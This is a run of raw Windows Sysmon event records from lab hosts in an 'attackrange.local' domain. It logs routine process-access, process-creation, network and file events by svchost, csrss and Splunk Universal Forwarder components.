08:05:35.488{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B5CF-615A-AF01-00000000FD01}920C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084131Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:35.488{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084130Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:35.488{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084129Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:35.488{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084128Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:35.488{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084127Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:35.488{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084126Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:35.488{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084125Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:35.488{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084124Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:35.488{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084123Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:35.488{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084122Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:35.488{2FDD8D40-AC98-615A-0500-00000000FD01}412428C:\Windows\system32\csrss.exe{2FDD8D40-B5CF-615A-AF01-00000000FD01}920C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000084121Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:35.488{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B5CF-615A-AF01-00000000FD01}920C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000084120Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:35.489{2FDD8D40-B5CF-615A-AF01-00000000FD01}920C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000084119Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:32.704{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50214-false10.0.1.12-8000- 23542300x8000000000000000108620Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:36.635{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F6E95C25DC5F33BA373132380293E96,SHA256=D98DF4F4890D43D91FA3F328F93015C1F49531AF3BD76D6E4A9D3456D8121CD2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000084150Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:36.754{2FDD8D40-B5D0-615A-B001-00000000FD01}680980C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084149Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:36.551{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B5D0-615A-B001-00000000FD01}680C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084148Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:36.551{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084147Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:36.551{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084146Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:36.551{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084145Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:36.551{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084144Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:36.551{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084143Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:36.551{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084142Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:36.551{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084141Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:36.551{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084140Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:36.551{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084139Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:36.551{2FDD8D40-AC98-615A-0500-00000000FD01}412528C:\Windows\system32\csrss.exe{2FDD8D40-B5D0-615A-B001-00000000FD01}680C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000084138Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:36.551{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B5D0-615A-B001-00000000FD01}680C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program 